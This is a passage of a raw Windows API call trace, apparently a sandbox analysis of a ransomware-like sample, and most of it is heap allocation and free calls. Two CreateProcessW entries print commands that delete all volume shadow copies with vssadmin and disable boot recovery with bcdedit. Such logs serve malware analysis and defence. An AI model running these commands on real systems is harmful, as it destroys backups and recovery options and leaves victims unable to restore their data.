dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0201.212] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0201.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0201.213] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0201.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df618 [0201.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e24b0 [0201.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0201.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0201.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0201.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0201.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc910 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2430 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc910 [0201.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc928 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2f8 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0201.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9a0 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0201.216] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2400 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.216] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x87f188, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7f8 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2460 [0201.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8f3388 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x9c3b98 [0201.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7f8 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2440 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x160) returned 0x8f7ac8 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3b98 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f3388 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2400 | out: hHeap=0x8a0000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2400 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2400 | out: hHeap=0x8a0000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2400 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2400 | out: hHeap=0x8a0000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaa) returned 0x8f8398 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2) returned 0x8e2400 [0201.222] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0201.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2a) returned 0xbca100 [0201.222] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xbca100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0201.222] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 5886623|vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f590*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f558 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 5886623|vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x87f558*(hProcess=0x230, hThread=0x234, dwProcessId=0x73c, dwThreadId=0x760)) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f8398 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca100 | out: hHeap=0x8a0000) returned 1 [0201.247] CloseHandle (hObject=0x234) returned 1 [0201.247] CloseHandle (hObject=0x230) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f7ac8 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0201.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df2f8 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0201.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0201.249] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.249] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2430 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df618 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24b0 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2f8 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc910 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0201.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0201.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df2f8 | out: hHeap=0x8a0000) returned 1 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e24b0 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc910 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2f8 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9a0 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0201.250] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0201.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0201.251] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.251] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x87f188, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7f8 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2440 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8f3388 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x9c3b98 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7f8 | out: hHeap=0x8a0000) returned 1 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x160) returned 0x8f7ac8 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3b98 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f3388 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xae) returned 0x8f8398 [0201.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2) returned 0x8e2460 [0201.252] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0201.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2a) returned 0xbca100 [0201.253] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xbca100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0201.253] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6532368|bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f590*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, 